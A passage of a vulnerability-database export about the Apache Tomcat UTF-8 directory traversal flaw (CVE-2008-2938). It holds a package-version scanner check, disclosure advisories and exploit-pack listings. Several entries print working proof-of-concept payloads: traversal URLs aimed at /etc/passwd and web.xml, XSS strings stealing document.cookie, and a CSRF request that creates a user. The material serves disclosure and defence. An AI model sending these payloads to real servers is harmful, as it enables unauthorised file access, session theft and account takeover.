rpm:\"dhcp~3.0.6~24.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.6~24.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.6~24.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.6~24.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.6~24.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dovecot\", rpm:\"dovecot~1.0.5~6.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dovecot-devel\", rpm:\"dovecot-devel~1.0.5~6.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun\", rpm:\"java-1_6_0-sun~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-alsa\", rpm:\"java-1_6_0-sun-alsa~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-debuginfo\", rpm:\"java-1_6_0-sun-debuginfo~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-demo\", rpm:\"java-1_6_0-sun-demo~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-devel\", rpm:\"java-1_6_0-sun-devel~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-jdbc\", rpm:\"java-1_6_0-sun-jdbc~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-plugin\", rpm:\"java-1_6_0-sun-plugin~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-src\", rpm:\"java-1_6_0-sun-src~1.6.0.u12~1.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipulog\", rpm:\"libipulog~1.24~36.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libtiff-devel\", rpm:\"libtiff-devel~3.8.2~68.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libtiff3\", rpm:\"libtiff3~3.8.2~68.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt\", rpm:\"libvirt~0.3.0~30.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-devel\", rpm:\"libvirt-devel~0.3.0~30.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-doc\", rpm:\"libvirt-doc~0.3.0~30.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-python\", rpm:\"libvirt-python~0.3.0~30.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.6.30~4.11\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.6.30~4.11\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.10.0~32.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"netatalk\", rpm:\"netatalk~2.0.3~130.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"netatalk-devel\", rpm:\"netatalk-devel~2.0.3~130.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"novell-ipsec-tools\", rpm:\"novell-ipsec-tools~0.6.3~114.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"novell-ipsec-tools-devel\", rpm:\"novell-ipsec-tools-devel~0.6.3~114.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.0~96.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp-devel\", rpm:\"openslp-devel~1.2.0~96.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp-server\", rpm:\"openslp-server~1.2.0~96.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-hash\", rpm:\"php5-hash~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mhash\", rpm:\"php5-mhash~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ncurses\", rpm:\"php5-ncurses~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sbl\", rpm:\"sbl~3.0f~16.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tiff\", rpm:\"tiff~3.8.2~68.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd\", rpm:\"ulogd~1.24~36.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-mysql\", rpm:\"ulogd-mysql~1.24~36.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-pcap\", rpm:\"ulogd-pcap~1.24~36.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-pgsql\", rpm:\"ulogd-pgsql~1.24~36.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-sqlite\", rpm:\"ulogd-sqlite~1.24~36.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"virtualbox\", rpm:\"virtualbox~1.5.2~10.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~1.5.2~10.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-devel\", rpm:\"xine-devel~1.1.8~14.11\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-extra\", rpm:\"xine-extra~1.1.8~14.11\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-lib\", rpm:\"xine-lib~1.1.8~14.11\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xorg-x11-driver-virtualbox\", rpm:\"xorg-x11-driver-virtualbox~1.5.2~10.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache Tomcat 6.0.18 - utf8 Directory Traversal (PoC)", "edition": 2, "cvss3": {}, "published": "2008-08-11T00:00:00", "title": "Apache Tomcat 6.0.18 - utf8 Directory Traversal (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2008-08-11T00:00:00", "id": "EXPLOITPACK:E8A3E2892846083A211FCBF12E4E9497", "href": "", "sourceData": "Title: Apache Tomcat Directory Traversal Vulnerability\nAuthor: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)\nSeverity: High\nImpact: Remote File Disclosure\nVulnerable Version: prior to 6.0.18\nSolution:\n - Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)\n - Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability.\n - Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix until next release.\nReferences:\n - http://tomcat.apache.org/security.html\n - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938\nHistory:\n - 07.17.2008: Initiate notify (To Apache Security Team)\n - 08.02.2008: Responsed this problem fixed and released new version\n - 08.05.2008: Notify disclosure (To Apache Tomcat Security Team)\n - 08.10.2008: Responsed with some suggestions.\n\nDescription\nAs Apache Security Team, this problem occurs because of JAVA side.\nIf your context.xml or server.xml allows 'allowLinking'and 'URIencoding' as\n'UTF-8', an attacker can obtain your important system files.(e.g. /etc/passwd)\n\nExploit\nIf your webroot directory has three depth(e.g /usr/local/wwwroot), An\nattacker can access arbitrary files as below. (Proof-of-concept)\n\nhttp://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar\n\n# milw0rm.com [2008-08-11]", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:06:08", "description": "\ntoutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities", "edition": 2, "cvss3": {}, "published": "2009-11-07T00:00:00", "title": "toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938", "CVE-2006-3835"], "modified": "2009-11-07T00:00:00", "id": "EXPLOITPACK:6FCC90F735198D0FCBF891519B34A910", "href": "", "sourceData": "&redirectSecure Network - Security Research Advisory\n\nVuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities\nSystems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882\nSystems not affected: --\nSeverity: High\nLocal/Remote: Remote\nVendor URL: http://www.toutvirtual.com\nAuthor(s): Alberto Trivero (a.trivero (at) securenetwork (dot) it [email concealed]) \nClaudio Criscione (c.criscione (at) securenetwork (dot) it [email concealed])\nVendor disclosure: 02/07/2009\nVendor acknowledged: 16/07/2009\nVendor patch release: notified us on 06/11/2009\nPublic disclosure: 07/11/2009\nAdvisory number: SN-2009-02\nAdvisory URL: http://www.securenetwork.it/advisories/sn-2009-02.txt\n\n*** SUMMARY ***\n\nToutVirtual's VirtualIQ Pro is specifically designed for IT administrators \nresponsible for managing virtual platforms. VirtualIQ Pro provides\nVisibility, Analytics and policy-based Optimization - all from one single\nconsole. VirtualIQ Pro is hypervisor-agnostic supporting both Type I and Type \nII hypervisors. VirtualIQ Pro can be used to visualize, analyze and \noptimize your choice of virtualization platform - Citrix, Microsoft,\nNovell, Oracle and/or VMware.\n\nMultiple vulnerabilities has been found which a allow an attacker to conduct \nvarious XSS and CSRF attack, and other attacks due to the use \nof an old an not hardened version of the web server.\n\n*** VULNERABILITY DETAILS ***\n\n(a) Cross-site scripting (XSS)\n\nDue to an improper sanitization of user's input, multiple XSS attacks \n(reflective and stored) are possible.\nReflective PoCs:\n\nhttp://server:9080/tvserver/server/user/setPermissions.jsp?userId=1\"><sc\nript>alert(1)</script>&resultResourceIds=111-222-1933email (at) address (dot) t [email concealed]\nst\n\nhttp://server:9080/tvserver/server/user/addDepartment.jsp?addNewDept=0&a\nmp;deptName=%22;alert(1);//&deptId=1&deptDesc=asd\n\nhttp://server:9080/tvserver/server/inventory/inventoryTabs.jsp?ID=1;aler\nt(1);//\n\nhttp://server:9080/tvserver/reports/virtualIQAdminReports.do?command=get\nFilter&reportName=%22%3E%3Cscript%3Ealert(1)%3C/script%3E\n\nStored XSS attacks can be triggered in the \"Middle Name\" parameter in the \n\"Edit Profile\" page with an HTTP request like the following:\n\nPOST /tvserver/user/user.do?command=save&userId=1 HTTP/1.1\nHost: server:9080\nCookies: JSESSIONID=[...]\n\nuserName=IQMANAGER&firstName=IQ&middleName=asd'; \nalert(document.cookie);//&lastName=MANAGER&email=user%40domain.it&passwo\nrd=********&retypePassword=********&redirect=null&passwordModifed=false&\nisReportUser=false&roleId=1&supervisorId=1&departmentId=1&locationId=1\n\n(b) Cross-site request forgery (CSRF)\n\nAn attacker can perform different types of CSRF attacks against a logged user. \nHe can, for example, shutdown, start or restart an arbitrary\nvirtual machine, schedule new activities and so on.\n\nThe following HTTP request, if forged by the attacker and executed by the \nvictim while logged on VirtualIQ, creates an arbitrary user:\n\nPOST /tvserver/user/user.do?command=save&userId= HTTP/1.1\nHost: server:9080\nCookie: JSESSIONID=[...]\n\nuserName=asd1&firstName=asd2&middleName=asd3&lastName=asd4&email=asd5%40\nasd.com&password=asd6&retypePassword=asd6=null&passwordModifed=\nfalse&isReportUser=false&roleId=1&supervisorId=1&departmentId=1&location\nId=1\n\n(c) Web server vulnerabilities\n\nVirtualIQ runs on top of an old version of Apache Tomcat: 5.5.9, for which \nmultiple public vulnerabilities have been released. As a \nPoC, a directory traversal attack (CVE-2008-2938) \ncan be performed as:\n\nhttp://server:9080/tvserver/server/%C0%AE%C0%AE/WEB-INF/web.xml\n\nListing of an arbitrary directory (CVE-2006-3835) can also be obtained with \nthe following PoC:\n\nhttp://192.168.229.85:9080/tvserver/server/;index.jsp\n\n(d) Information Leakage\n\nTomcat status page should be disabled or restricted, being accessible at:\n\nhttp://status:9080/status\n\nUsername and password to access a VM through SSH are also available in clear \ntext in the configuration page. \nSince an XSS vulnerability can also be triggered in the same page, an attacker \nwould also be able to easily capture the full credentials to access \nthe VM with a specially crafted XSS payload.\n\n(e) Remote code execution\n\nJBoss JMX Management Console is exposed and can be used by remote attackers to \nexecute arbitrary commands on the system:\n\nhttp://server:9080/jmx-console/\n\nJBoss Web Console is exposed as well and can be used by remote attackers to \nexecute any command on the system:\n\nhttp://server:9080/web-console/\n\n*** EXPLOIT ***\n\nAttackers may exploit these issues through a common browser as explained \nabove.\n\n*** FIX INFORMATION ***\n\nUpgrade to the latest version, at the moment 3.5 build 10.14.2009\n\n*** WORKAROUNDS ***\n\n--\n\n*********************\n*** LEGAL NOTICES ***\n*********************\n\nSecure Network (www.securenetwork.it) is an information security company, \nwhich provides consulting and training services, and engages in security \nresearch and development.\n\nWe are committed to open, full disclosure of vulnerabilities, cooperating\nwhenever possible with software developers for properly handling disclosure.\n\nThis advisory is copyright 2009 Secure Network S.r.l. Permission is \nhereby granted for the redistribution of this alert, provided that it is\nnot altered except by reformatting it, and that due credit is given. It \nmay not be edited in any way without the express consent of Secure Network \nS.r.l. Permission is explicitly given for insertion in vulnerability \ndatabases and similars, provided that due credit is given to Secure Network.\n\nThe information in the advisory is believed to be accurate at the time of \npublishing based on currently available information. This information is\nprovided as-is, as a free service to the community by Secure Network \nresearch staff. There are no warranties with regard to this information. \nSecure Network does not accept any liability for any direct, indirect,\nor consequential loss or damage arising from use of, or reliance on,\nthis information.\n\nIf you have any comments or inquiries, or any issue with what is reported \nin this advisory, please inform us as soon as possible.\n\nE-mail: securenetwork (at) securenetwork (dot) it [email concealed]\nGPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc\nPhone: +39 02 24 12 67 88\n\n-- \nClaudio Criscione\n\nSecure Network S.r.l.\nVia Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia\nTel: +39 02.24126788 Mob: +39 392 3389178\nemail: c.criscione (at) securenetwork (dot) it [email concealed]\nweb: www.securenetwork.it", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "d2": [{"lastseen": "2021-07-28T14:32:16", "description": "**Name**| d2sec_tomcat_utf8 \n---|--- \n**CVE**| CVE-2008-2938 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| Apache Tomcat Directory Traversal \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2008-08-13T00:41:00", "title": "DSquare Exploit Pack: D2SEC_TOMCAT_UTF8", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2008-08-13T00:41:00", "id": "D2SEC_TOMCAT_UTF8", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_tomcat_utf8", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2021-11-05T00:13:04", "description": "A directory traversal vulnerability was reported in Apache Tomcat. Apache Tomcat is an implementation of the Java Servlet and JavaServer Pages technologies, and is a popular and common platform for deploying web applications. This vulnerability allows a hacker to access normally-inaccessible files and directories through a specially-created HTTP request. Instead of having access only to the publically-available files, the hacker can have access to all files on that server using this vulnerability.", "cvss3": {}, "published": "2008-08-19T00:00:00", "type": "checkpoint_advisories", "title": "Preemptive Protection against Apache Tomcat allowLinking URIencoding Directory Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2008-08-22T00:00:00", "id": "CPAI-2008-134", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T12:40:41", "description": "Apache Tomcat is an implementation of the Java Servlet and JavaServer pages technologies. The software provides the servlet container used in development and deployment of Java based web applications. Users access Tomcat applications using web browsers that communicate to the server via the HTTP protocol. By default configuration, Tomcat listens on TCP port 8080. There exists a directory traversal vulnerability in the Apache Tomcat. The vulnerability is due to an input validation error in Tomcat that does not properly sanitize the URI for the directory traversal patterns. Successful exploitation allows unauthenticated remote attackers to disclose or access arbitrary files on the vulnerable server. The target will not exhibit any unusual behaviour as a result of this attack. A successful attack will allow the attacker to gain access to blocked Tomcat applications. This may lead to disclosure of sensitive information hosted by those applications.", "cvss3": {}, "published": "2009-11-01T00:00:00", "type": "checkpoint_advisories", "title": "Apache Tomcat URIencoding Directory Traversal (CVE-2007-0450; CVE-2008-2938)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": 